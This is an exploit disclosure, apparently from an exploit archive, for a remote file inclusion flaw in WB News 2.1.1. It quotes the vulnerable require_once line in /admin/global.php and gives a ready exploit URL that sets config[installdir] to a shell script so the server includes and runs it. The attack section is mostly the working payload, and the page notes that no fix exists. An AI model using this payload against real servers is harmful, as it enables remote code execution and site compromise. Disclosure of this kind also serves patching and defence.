WB News 2.1.1 config[installdir] Remote File Inclusion Vulnerability

2009-02-09 23:33:13

-----------------:Remote File Include:-----------------
-------------------------------------------------------
script:wb news v2.1.1

------------------------------------------------------------------
download from:http://www.webmobo.com/downloads/

------------------------------------------------------------------

.......................................................
vul: /admin/global.php line 32;


require_once( $config["installdir"] . "/includes/constants.php" );

------------------------------------------------------
-----------------------------------------------------

xpl:

http://127.0.0.1/admin/global.php?config[installdir]=shell.txt?

***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [[email protected]]

from[iran]
---------------------------------------------------

#

Fixes

No fixes

In order to submit a new fix you need to be registered.